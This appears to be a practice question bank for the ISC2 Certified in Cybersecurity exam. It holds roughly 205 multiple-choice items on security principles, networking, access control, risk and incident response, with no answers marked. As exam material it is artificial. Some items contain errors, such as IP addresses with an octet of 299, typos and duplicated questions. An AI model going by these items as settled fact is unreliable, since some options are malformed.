ISC 2 CC | 205 questions

The address 8be2:4382:8d84:7ce2:ec0f:3908:d29a:903a is an: Web address. IPv4 address. IPv6 address. Mac address.

Which of the following canons is found in the ISC2 code of ethics?. Advance and promote the profession. Protect society, the common good, and the infrastructure. Provide diligent and competent service to principals. Act honorably, honestly, safely and legally.

Which of the following is NOT an ethical canon of the ISC2?. Advance and protect the profession. Protect society, the common good, necessary public trust and confidence, and the infrastructure. Act honorably, honestly, justly, responsibly and legally. Provide active and qualified service to principal.

The cloud deployment model where a company has resources on-premise and in the cloud is known as: Hybrid cloud. Multi-tenant. Private cloud. Community cloud.

Which of the following is a public IP?. 13.16.123.1. 192.168.123.1. 172.16.123.1. 10.221.123.1.

Which of the following is a data handling policy procedure?. Transform. Collect. Encode. Destroy.

Which devices would be more effective in detecting an intrusion into a network?. Routers. HIDS. Firewalls. NIDS.

Which concept describes an information security strategy that integrates people, technology and operations in order to establish security controls across multiple layers of the organization?. Least Privilege. Defense in Depth. Separation of Duties. Privileged Accounts.

Which access control is more effective at protecting a door against unauthorized access?. Fences. Turnstiles. Barriers. Locks.

Which of the following is a detection control?. Turnstiles. Smoke sensors. Bollards. Firewalls.

Which type of attack has the PRIMARY objective controlling the system from outside?. Backdoors. Rootkits. Cross-Site Scripting. Trojans.

Which of the following is not a protocol of the OSI Level 3?. SNMP. ICMP. IGMP. IP.

When a company hires an insurance company to mitigate risk, which risk management technique is being applied?. Risk avoidance. Risk transfer. Risk mitigation. Risk tolerance.

The SMTP protocol operates at OSI Level: 7. 25. 3. 23.

The process of verifying or proving the user's identification is known as: Confidentiality. Integrity. Authentication. Authorization.

If an organization wants to protect itself against tailgating, which of the following types of access control would be most effective?. Locks. Fences. Barriers. Turnstiles.

Logging and monitoring systems are essential to: Identifying inefficient performing systems, preventing compromises, and providing a record of how systems are used. Identifying efficient performing systems, labeling compromises, and providing a record of how systems are used. Identifying inefficient performing systems, detecting compromises, and providing a record of how systems are used. Identifying efficient performing systems, detecting compromises, and providing a record of how systems are used.

In the event of a disaster, which of these should be the PRIMARY objective? (★). Guarantee the safety of people. Guarantee the continuity of critical systems. Protection of the production database. Application of disaster communication.

The process that ensures that system changes do not adversely impact business operations is known as: Change Management. Vulnerability Management. Configuration Management. Inventory Management.

The last phase in the data security cycle is: Encryption. Backup. Archival. Destruction.

Which access control model specifies access to an object based on the subject's role in the organization?. RBAC. MAC. DAC. ABAC.

Which of the following is NOT an example of a physical security control?. Firewalls. Biometric access controls. Remote control electronic locks. Security cameras.

Which type of attack will most effectively maintain remote access and control over the victim's computer?. Trojans. Phishing. Cross-Site Scripting. Rootkits.

In incident terminology, the meaning of Zero Day is: Days to solve a previously unknown system vulnerability. A previously unknown system vulnerability. Days without a cybersecurity incident. Days with a cybersecurity incident.

Which of the following is NOT a possible model for an Incident Response Team (IRT)?. Leveraged. Pre-existing. Dedicated. Hybrid.

A device found not to comply with the security baseline should be: Disabled or separated into a quarantine area until a virus scan can be run. Disabled or isolated into a quarantine area until it can be checked and updated. Placed in a demilitarized zone (DMZ) until it can be reviewed and updated. Marked as potentially vulnerable and placed in a quarantine area.

A biometric reader that grants access to a computer system in a data center is a: Administrative Control. Physical Control. Authorization Control. Technical Control.

Which type of attack PRIMARILY aims to make a resource inaccessible to its intended users?. Denials of Service. Phishing. Trojans. Cross-Site Scripting.

Which type of attack embeds malicious payload inside a reputable or trusted software?. Trojans. Phishing. Rootkits. Cross-Site Scripting.

Which tool is commonly used to sniff network traffic? (★). Burp Suite. John the Ripper. Wireshark. Nslookup.

Which of these is not an attack against an IP network?. Side-channel Attack. Man-in-the-middle Attack. Fragmented Packet Attack. Oversized Packet Attack.

The detailed steps to complete tasks supporting departmental or organizational policies are typically documented in: Regulations. Standards. Policies. Procedures.

Which device is used to connect a LAN to the Internet?. SIEM. HIDS. Router. Firewall.

What does SIEM mean?. Security Information and Enterprise Manager. Security Information and Event Manager. System Information and Enterprise Manager. System Information and Event Manager.

A Security safeguard is the same as a: Safety control. Privacy control. Security control. Security principle.

Which access control model can grant access to a given object based on complex rules?. DAC. ABAC. RBAC. MAC.

Which port is used to secure communication over the web (HTTPS)?. 69. 80. 25. 443.

Which of these has the PRIMARY objective of identifying and prioritizing critical business processes?. Business Impact Plan. Business Impact Analysis. Disaster Recovery Plan. Business Continuity Plan.

Which of the following are NOT types of security controls?. Common controls. Hybrid controls. System-specific controls. Storage controls.

Which of the following is NOT a type of learning activity used in Security Awareness?. Awareness. Training. Education. Tutorial.

The magnitude of the harm expected as a result of the consequences of an unauthorized disclosure, modification, destruction, or loss of information, is known as the: Vulnerability. Threat. Impact. Likelihood.

The implementation of Security Controls is a form of: Risk reduction. Risk acceptance. Risk avoidance. Risk transference.

Which of the following attacks take advantage of poor input validation in websites?. Trojans. Cross-Site Scripting. Phishing. Rootkits.

Which of the following is an example of an administrative security control?. Access Control Lists. Acceptable Use Policies. Badge Readers. No entry signs.

In Change Management, which component addresses the procedures needed to undo changes?. Request for Approval. Request for Change. Rollback. Disaster and Recover.

Which of the following properties is NOT guaranteed by Digital Signatures?. Authentication. Confidentiality. Non-Repudiation. Integrity.

Which devices have the PRIMARY objective of collecting and analyzing security events?. Hubs. Firewalls. Routers. SIEM.

What is an effective way of hardening a system?. Patch the system. Have an IDS in place. Run a vulnerability scan. Create a DMZ for web application services.

Which type of key can be used to both encrypt and decrypt the same message?. A public key. A private key. An asymmetric key. A symmetric key.

Which regulations address data protection and privacy in Europe?. SOX. HIPAA. FISMA. GDPR.

Which of the following types of devices inspect packet header information to either allow or deny network traffic?. Hubs. Firewalls. Routers. Switches.

A web server that accepts requests from external clients should be placed in which network?. Intranet. DMZ. Internal Network. VPN.

Sensitivity is a measure of the …: … protection and timeliness assigned to information by its owner, or the purpose of representing its need for urgency. … urgency and protection assigned to information by its owner. … importance assigned to information by its owner, or the purpose of representing its need for protection. … pertinence assigned to information by its owner, or the purpose of representing its need for urgency.

How many data labels are considered good practice?. 2 - 3. 1. 1-2. >4.

Security posters are an element PRIMARILY employed in: (★). Security Awareness. Incident Response Plans. Business Continuity Plans. Physical Security Controls.

Which of these types of user is LESS likely to have a privileged account?. System Administrator. Security Analyst. Help Desk. External Worker.

Which of the following is NOT an element of System Security Configuration Management?. Inventory. Baselines. Updates. Audit logs.

Which are the components of an incident response plan?. Preparation -> Detection and Analysis -> Recovery -> Containment -> Eradication -> Post-Incident Activity. Preparation -> Detection and Analysis -> Containment -> Eradication -> Post-Incident Activity -> Recovery. Preparation -> Detection and Analysis -> Eradication -> Recovery -> Containment -> Post-Incident Activity. Preparation -> Detection and Analysis -> Containment, Eradication and Recovery -> Post-Incident Activity.

Which of the following is an example of 2FA?. Badges. Passwords. Keys. One-Time passwords (OTA).

The predetermined set of instructions or procedures to sustain business operations after a disaster is commonly known as: Business Impact Analysis. Disaster Recovery Plan. Business Impact Plan. Business Continuity Plan.

Which of the following is NOT a feature of a cryptographic hash function?. Reversible. Unique. Deterministic. Useful.

Which are the three packets used on the TCP connection handshake? (★). Offer → Request → ACK. SYN → SYN/ACK → ACK. SYN → ACK → FIN. Discover → Offer → Request.

After an earthquake disrupting business operations, which document contains the procedures required to return business to normal operation?. The Business Impact Plan. The Business Impact Analysis. The Business Continuity Plan. The Disaster Recovery Plan.

What is the consequence of a Denial Of Service attack?. Exhaustion of device resources. Malware Infection. Increase in the availability of resources. Remote control of a device.

According to ISC2, which are the six phases of data handling?. Create -> Use -> Store -> Share -> Archive -> Destroy. Create -> Store -> Use -> Share -> Archive -> Destroy. Create -> Share -> Use ->Store -> Archive -> Destroy. Create -> Share -> Store -> Use -> Archive -> Destroy.

Which of the following is less likely to be part of an incident response team?. Legal representatives. Human Resources. Representatives of senior management. Information security professionals.

Which of these tools is commonly used to crack passwords? (★). Burp Suite. Nslookup. John the Ripper. Wireshark.

In order to find out whether personal tablet devices are allowed in the office, which of the following policies would be helpful to read?. BYOD. Privacy Policy. Change Management Policy. AUP.

In which cloud deployment model do companies share resources and infrastructure on the cloud?. Hybrid cloud. Multi-tenant. Private cloud. Community cloud.

Which of these is the PRIMARY objective of a Disaster Recovery Plan?. Restore company operation to the last-known reliable operation state. Outline a safe escape procedure for the organization's personnel. Maintain crucial company operations in the event of a disaster. Communicate to the responsible entities the damage caused to operations in the event of a disaster.

An entity that acts to exploit a target organization’s system vulnerabilities is a: Threat Vector. Threat Actor. Threat. Attacker.

A best practice of patch management is to: Apply all patches as quickly as possible. Test patches before applying them. Apply patches every Wednesday. Apply patches according to the vendor's reputation.

Which of these would be the best option if a network administrator needs to control access to a network?. HIDS. IDS. SIEM. NAC.

Which of these is NOT a change management component?. Approval. RFC. Rollback. Governance.

Which of the following is NOT a social engineering technique?. Pretexting. Quid pro quo. Double-dealing. Baiting.

If there is no time constraint, which protocol should be employed to establish a reliable connection between two devices?. TCP. DHCP. SNMP. UDP.

An exploitable weakness or flaw in a system or component is a: Threat. Bug. Vulnerability. Risk.

In which cloud model does the cloud customer have LESS responsibility over the infrastructure? (★). IaaS. FaaS. PaaS. SaaS.

Risk Management is: The assessment of the potential impact of a threat. The creation of an incident response team. The impact and likelihood of a threat. The identification, evaluation and prioritization of risks.

Which of the following documents contains elements that are NOT mandatory?. Policies. Guidelines. Regulations. Procedures.

In which of the following phases of an Incident Recovery Plan are incident responses prioritized?. Post-incident Activity. Detection and Analysis. Preparation. Contentment, Eradication, and Recovery.

Which security principle states that a user should only have the necessary permission to execute a task?. Privileged Accounts. Separation of Duties. Least Privilege. Defense in Depth.

The Bell and LaPadula access control model is a form of: (★). ABAC. RBAC. MAC. DAC.

In risk management, the highest priority is given to a risk where: The frequency of occurrence is low, and the expected impact value is high. The expected probability of occurrence is low, and the potential impact is low. The expected probability of occurrence is high, and the potential impact is low. The frequency of occurrence is high, and the expected impact value is low.

Which of the following areas is connected to PII?. Non-Repudiation. Authentication. Integrity. Confidentiality.

According to the canon "Provide diligent and competent service to principals", ISC2 professionals are to: Take care not to tarnish the reputation of other professionals through malice or indifference. Treat all members fairly and,when resolving conflicts, consider public safety and duties to principals, individuals and the profession, in that order. Avoid apparent or actual conflicts of interest. Promote the understanding and acceptance of prudent information security measures.

Malicious emails that aim to attack company executives are an example of: Trojans. Whaling. Phishing. Rootkits.

Governments can impose financial penalties as a consequence of breaking a: Regulation. Standard. Policy. Procedure.

Which type of attack attempts to trick the user into revealing personal information by sending a fraudulent message?. Phishing. Cross-Site Scripting. Denials of Service. Trojans.

In which of the following access control models can the creator of an object delegate permission?. ABAC. MAC. RBAC. DAC.

Which type of attack has the PRIMARY objective of encrypting devices and their data, and then demanding a ransom payment for the decryption key?. Ransomware. Trojan. Cross-Site Scripting. Phishing.

Which of the following cloud models allows access to fundamental computer resources? (★). SaaS. FaaS. PaaS. IaaS.

How many layers does the OSI model have?. 7. 4. 6. 5.

Which of the following principles aims primarily at fraud detection?. Privileged Accounts. Defense in Depth. Least Privilege. Separation of Duties.

Which protocol uses a three-way handshake to establish a reliable connection?. TCP. SMTP. UDP. SNMP.

Which of the following is an example of a technical security control?. Access control lists. Turnstiles. Fences. Bollards.

Which type of attack attempts to gain information by observing the device's power consumption? (★). Side Channels. Trojans. Cross Site Scripting. Denials of Service.

Which of the following areas is the most distinctive property of PHI?. Integrity. Confidentiality. Non-Repudiation. Authentication.

Which of these is the most efficient and effective way to test a business continuity plan?. Simulations. Walkthroughs. Reviews. Discussions.

Which of the following Cybersecurity concepts guarantees that information is accessible only to those authorized to access it?. Confidentiality. Non-repudiation. Authentication. Accessibility.

In the event of a disaster, what should be the PRIMARY objective? (★). Apply disaster communication. Protect the production database. Guarantee the safety of people. Guarantee the continuity of critical systems.

A security professional should report violations of a company's security policy to: The ISC Ethics Committee. Company management. National authorities. A court of law.

Which department in a company is NOT regularly involved in a DRP?. Executives. IT. Public Relations. Financial.

Which of the following is included in an SLA document?. A plan to prepare the organization for the continuation of critical business functions. A plan to keep business operations going while recovering from a significant disruption. Instructions to detect, respond to, and limit the consequences of a cyber-attack. Instructions on data ownership and destruction.

What is the most important difference between MAC and DAC?. In MAC, security administrators set the roles for the users; in DAC, roles are set at the object owner’s discretion. In MAC, security administrators assign access permissions; in DAC, security administrators set user roles. In MAC, security administrators assign access permissions; in DAC, access permissions are set at the object owner’s discretion. In MAC, access permissions are set at the object owner’s discretion; in DAC, it is up to security administrators to assign access permissions.

Requiring a specific user role to access resources is an example of: MAC. ABAC. RBAC. DAC.

Which type of document outlines the procedures ensuring that vital company systems keep running during business- disrupting events?. Business Impact Plan. Business Impact Analysis. Disaster Recovery Plan. Business Continuity Plan.

Which of the following is NOT a best practice in access management?. Give only the right amount of permission. Periodically assess if user permissions still apply. Request a justification when upgrading permission. Trust but verify.

If a company collects PII, which policy is required?. Remote Access Policy. GDPR. Privacy Policy. Acceptable Use Policy.

Which of these is LEAST likely to be installed by an infection?. Logic Bomb. Keylogger. Trojan. Backdoor.

(★) The best defense method to stop a 'Replay Attack' is to: Use an IPSec VPN. Use a Firewall. Use password authentication. Use message digesting.

Which of these devices has the PRIMARILY objective of determining the most efficient path for the traffic to flow across the networks?. Hubs. Firewalls. Routers. Switches.

Which of these types of malware self-replicates without the need for human intervention?. Worm. Trojan. Virus. Rootkits.

As an (ISC)² member, you are expected to perform with due care. What does 'due care' specifically mean?. Do what is right in each situation you encounter on the job. Give continuity to the legacy of security practices of your company. Apply patches annually. Researching and acquiring the knowledge to do your job right.

(★) Which of these is NOT a best practice in access management?. Periodically assessing whether user permissions still apply. Requesting a justification when upgrading permission. Giving only the right amount of permission. Trust but verify.

During the investigation of an incident, which security policies are more likely to cause difficulties?. Configuration standards. Incident response policies. Communication policies. Retention policies.

In an Access Control List (ACL), the element that determines which permissions you have is: The subject. The object. The firmware. The rule.

What does the term 'data remanence' refer?. Data in use that can't be encrypted. Files saved locally that can't be remoted accessed. Data left over after routine removal and deletion. All of the data in a system.

(★) Which type of recovery site has some or most systems in place, but does not have the data needed to take over operations?. A hot site. A cloud site. A warm site. A cold site.

Which of these is NOT a characteristic of an MSP implementation?. Manage all in-house company infrastructure. Monitor and respond to security incidents. Mediate, execute and decide top-level decisions. Utilize expertise for the implementation of a product or service.

Which of these is NOT a typical component of a comprehensive business continuity plan (BCP)?. A cost prediction of the immediate response procedures. Immediate response procedures and checklists. Notification systems and call trees for alerting personnel. A list of the BCP team members.

Acting ethically is mandatory for (ISC)² members. Which of these is NOT considered unethical?. Disrupting the intended use of the internet. Seeking to gain unauthorized access to resources on thae internet. Compromising the privacy of users. Having fake social media profiles and accounts.

In an incident response process, which phase uses indicators of compromise and log analysis as part of a review of events?. Preparation. Eradication. Identification. Containment.

Which of these Access Control Systems is commonly used in the military?. ABAC. DAC. RBAC. MAC.

Which of these is NOT a security principle?. Security in Depth (SID). Zero Trust model. Least Privilege. Separation of Duties.

Which of these is not a common goal of a cybersecurity attacker?. Allocation. Alteration. Disclosure. Denial.

Which of these types of layers is NOT part of the TCP/IP model?. Application. Physical. Internet. Transport.

On a BYOD model, which of these technologies is best suited to keep corporate data and applications separate from personal?. Biometrics. Full-device encryption. Context-aware authentication. Containerization.

In the context of risk management, which information does ALE outline?. The expected cost per year of not performing a given risk-mitigating action. The business impact of a risk. The percentage of Asset Lost Efficiency. The probability of a risk coming to pass in a given year.

Which of these techniques is PRIMARILY used to ensure data integrity?. Message Digest. Content Encryption. Backups. Hashing.

Which of these is an example of a privacy breach?. Any observable occurrence in a network or system. Being exposed to the possibility of attack. Unavailability of critical systems. Access of private information by an unauthorized person.

Which of these terms refers to a collection of fixes?. Downgrade. Patch. Service Pack. Hotfix.

While performing background checks on new employees, which of these can NEVER be an attribute for discrimination?. Employment history, references, criminal records. Credit history, employment history, references. Criminal Records, credit history, references. References, education, political affiliation, employment history.

When looking for cybersecurity insurance, which of these is the MOST IMPORTANT objective?. Risk acceptance. Risk transference. Risk avoidance. Risk spreading.

Which of these documents is MORE directly related to what can be done with a system or with its information?. SLA. MOA. MOU. ROE.

Which kind of document outlines the procedures ensuring that vital company systems keep running during business- disrupting events?. Business Impact Analysis. Business Impact Plan. Business Continuity Plan. Disaster Recovery Plan.

Which of these social engineering attacks sends emails that target specific individuals?. Pharming. Whaling. Vishing. Spear phishing.

(★) Which of these properties is NOT guaranteed by a Message Authentication Code (MAC)?. Authenticity. Anonymity. Integrity. Non-repudiation.

What is the PRIMARY objective of a degaussing?. Preventing magnetic side-channel attacks. Reducing noisy data on a disk. Erasing the data on a disk. Retaining the data on a disk.

Which of these is part of the canons (ISC)² code of ethics?. Provide diligent and competent services to stakeholders. Advance and protect the profession. Prevent and detect unauthorized use of digital assets in a society. Act always in the best interest of your client.

Which of these is NOT one of the (ISC)² ethics canons?. Act honorably, honestly, justly, responsibly, and legally. Consider the social consequences of the systems you are designing. Protect society, the common good, necessary public trust and confidence, and the infrastructure. Provide diligent and competent service to principals.

(★) Which of these is the PRIMARY objective of the PCI-DSS standard?. Personally Identifiable Information (PII). Change Management. Secure Credit Cards Payments. Protected Health Information (PHI).

Which of these is an attack that encrypts the organization's information, and then demands payment for the decryption code?. Phishing. DDoS. Spoofing. Ransomware.

The PRIMARY objective of a business continuity plan is: To regularly verify whether the organization complies with applicable regulations. To sustain business operations while recovering from a disruption. To assess the impact of disruption to the business. To restore the business to the full last-known reliable state of operations.

Which of these is an attack whose PRIMARY goal is to gain access to a target system through falsified identity?. Ransomware. Amplification. Spoofing. DDoS.

When an incident occurs, which of these is not a PRIMARY responsibility of an organization's response team?. Determining the scope of the damage caused by the incident. Implementing the recovery procedures necessary to restore security and recover from any incident-related damage. Determining whether any confidential information has been compromised over the course of the entire incident. Communicating with top management regarding the circumstances of the cybersecurity event.

What is the PRIMARY objective of a rollback in the context of the change management process?. Identify the required changes needed. Validate the system change process. Restore the system to its last state before the change was made. Establish a minimum understood and acceptable level of security requirements.

Which of these entities is responsible for signing an organization's policies?. Human Resources. Security engineer. Financial Department. Senior management.

Which of these terms refers to threats with unusually high technical and operational sophistication, spanning months or even years?. Rootkit. APT. Side-channel. Ping of death.

The PRIMARY objective of a security baseline is to establish ... a minimum understood and a good level of security requirements. a minimum understood and acceptable level of security requirements. security and configuration requirements. a maximum understood and an acceptable level of security requirements.

Which of these attacks take advantage of inadequate input validation in websites?. Phishing. Trojans. Cross-Site Scripting. Rootkits.

An organization needs a network security tool that detects and acts in the event of malicious activity. Which of these tools will BEST meet their needs?. Router. IPS. IDS. Firewall.

In a DAC policy scenario, which of these tasks can only be performed by a subject granted access to information?. Changing security attributes. Reading the information. Executing the information. Modifying the information.

In the event of non-compliance, which of these can have considerable financial consequences for an organization?. Policies. Regulations. Guidelines. Standards.

What does the term LAN refer to?. A tool to manage and control network traffic, as well as to protect a network. A network on a building or limited geographical area. A device that connects multiple other devices in a network. A long-distance connection between geographically-distant networks.

Which of these is a type of corrective security control?. Patches. Intrusion detection systems. Guidelines. Encryption.

Which of these enables point-to-point online communication over an untrusted network?. VLAN. Firewall. Router. VPN.

At which of the OSI layers do TCP and UDP work?. Transport Layer. Session Layer. Application Layer. Physical Layer.

(★) Which is the PRIMARY focus of the ISO 27002 standard?. Health Insurance Portability and Accountability Act (HIPAA). Information Security Management System (ISMS). Risk Management. Application Security.

(★) Which of these different sub-masks will allow 30 hosts?. /26. /30. /27. /29.

(★) Which of these statements about the security implications of IPv6 is NOT true?. Rules based on static IPv6 addresses may not work. IPv6's NAT implementation is insecure. IPv6 traffic may bypass existing security controls. IPv6 reputation services may not be mature and useful.

Which of these is a type of detective access control?. Bollards. Movement Sensors. Turnstiles. Firewalls.

The name, age, location and job title of a person are all examples of: Biometric factors. Attributes. Account permissions. Identity factors.

Which cloud service model provides the most suitable environment for customers who want to install their custom operating system?. SaaS. SLA. IaaS. PaaS.

(★) Which of these statements is TRUE about cybersquatting?. Its an unethical practice but everyone does it. It is partially illegal practice. It is an illegal practice. It is s a legal practice.

Which of these addresses is commonly reserved specifically for broadcasting?. 192.299.121.254. 192.299.121.0. 192.299.121.14. 192.299.121.255.

Which department in a company is NOT typically involved in a Disaster Recovery Plan (DRP)?. Executive. Financial. Public Relations. IT.

Which of these pairs does NOT constitute Multi-Factor Authentication (MFA)?. Fingerprint and password. Username and retina scan. Password and username. PIN and credit card.

Which method is COMMONLY used to map live hosts in the network?. Geolocation. Traceroute. Ping sweep. Wireshark.

A poster reminding the best password management practices is an example of which type of learning activity?. Awareness. Schooling. Education. Training.

Which part of the CIA Triad will be PRIMARILY jeopardized in a Distributed Denial Of Service (DDOS) attack?. Accountability. Availability. Integrity. Confidentiality.

What technology is MOST LIKELY to conserve the storage space required for video recordings?. Motion detection. PTZ. Facial recognition. Infrared cameras.

An organization that uses a layered approach when designing its security architecture is using which of these security approaches?. Zero trust. Defense in depth. Network Layers. Network Control Access.

Which of these techniques will ensure the property of 'non-repudiation'?. Using a VPN. Passwords. Encryption. Digital signatures.

(★) A USB pen with data passed around the office is an example of: Data in motion. Data at rest. Data in transit. Data in use.

Suppose that an organization wants to implement measures to strengthen its detective access controls. Which one of these tools should they implement?. Patches. Encryption. IDS. Backups.

(★) Which of these is an example of a MAC address?. 00-51-02-1F-58-F6. 0051021f58. 10.23.19.49. 2001 : db8: 3333 : 4444 : 5555 : 6666 : 7777 : 8888.

Which of these types of credentials is NOT used in multi-factor authentication?. Something you have. Something you know. Something you are. Something you trust.

On an Incident Response team, which role acts as the team's main link to Senior Management?. Information security. Communications and public relations. Management. Technical expert.

Which of these is NOT an effective way to protect an organization from cybercriminals?. Removing or disabling unneeded services and protocols. Using firewalls. Using out-dated anti-malware software. Using intrusion detection and prevention systems.

Which of these CANNOT be a corrective security control?. Disaster Recovery Plan. Backups. Patches. Bollards.

Which of these is included in an SLA document?. Instructions on data ownership and destruction. Instructions to detect, respond to, and limit the consequences of a cyber-attack. A plan to keep business operations going while recovering from a significant disruption. A plan to prepare the organization for the continuation of critical business functions.

Which port number corresponds to the Simple Mail Transfer Protocol (SMTP)?. 161. 69. 25. 22.

Which type of attack attempts to mislead the user into exposing personal information by sending fraudulent emails?. Cross-Site Scripting. Denial of Service. Trojans. Phishing.

Which of these is NOT a characteristic of the cloud?. Zero Customer Responsibility. Broad Network Access. Measured Service. Rapid Elasticity.

Which of these is a COMMON mistake made when implementing record retention policies?. Not categorizing the type of information to be retained. Not labeling the type of information to be retained. Applying the longest retention periods to the information. Applying shorter retention periods to the information.

Which type of security control does NOT include CCTV cameras?. Corrective. Deterrent. Preventive. Detective.

A security consultant hired to design the security policies for the PHI within an organization will be primarily handling: Personal Health information. Public Health information. Procedural Health information. Protected Health information.

Which of these cloud deployment models is a combination of public and private cloud storage?. Community. Private. Hybrid. Public.

What is the primary goal of a Change Management Policy?. To standardize the creation of the organization's network and computer systems. To guarantee that systems are up to date with the latest security patch. To standardize the usage of the organization's network and computer systems. To guarantee that system changes are performed without negatively affecting business operations.

Which of these is NOT a feature of a SIEM (Security Information and Event Management)?. Log auditing. Log encryption. Log consolidation. Log retention.

Which of these technologies is the LEAST effective means of preventing shared accounts?. Requiring a one-time password via an application. Requiring one-time passwords via a token. Password complexity requirements. Requiring biometric authentication.

Which of these is NOT a best practice in access management?. Trust but verify. Periodically assessing whether user permissions still apply. Giving only the right amount of permission. Requesting a justification when upgrading permission.

(★) When analyzing risks, which of these activities is required?. Accepting all evaluated risks. Identifying risks associated with loss of confidentiality. Determining the likelihood of occurrence of a set of risks. Selecting the appropriate controls.

Which of these exercises goes through a sample of an incident step-by-step, validating what each person will do?. A simulation exercise. A walk-through exercise. A tabletop exercise. A checklist exercise.

(★) Which of these types of documents is usually THE LEAST formal?. Standards. Guidelines. Policies. Regulations.

A backup that captures the changes made since the latest full backup is an example of: A differential backup. An incremental backup. A backup snapshot. A full backup.

A high-level executive of an organization receives a malicious email that tries to trick him. Which attack is the perpetrator using?. DDOS. Whaling. Phishing. Spear phishing.

What does redundancy mean in the context of cybersecurity?. Designing systems with robust components, so that the organization has more attack resilience. Conceiving systems with only the most necessary components, so that the organization has just the necessary risks. Conceiving systems with less attack surface, so that the attacker has less chance of success. Conceiving systems with duplicate components so that, if a failure occurs, there will be a backup.

When a company collects PII, which policy is required?. Remote Access Policy. GDPR. Privacy Policy. Acceptable Use Policy.

Which type of attack PRIMARILY aims to consume all the available resources, thereby making an organization's service inaccessible to its intended users?. Trojans. Cross-Site Scripting. Denial of Service. Phishing.

Which one of these tools is MOST likely to detect an XSS vulnerability?. Network vulnerability scanner. Static application test. Intrusion detection system. Web application vulnerability scanner.

Which kind of physical access control is LESS effective at preventing unauthorized individual access to a data center?. Turnstiles. Barriers. Fences. Bollards.

Which of these is NOT a type of malware?. Trojan. Worm. Spoofing. Rootkit.

Which security principle states that a user should only have the necessary permission to execute a task?. Privileged Accounts. Separation of Duties. Least Privilege. Defense in Depth.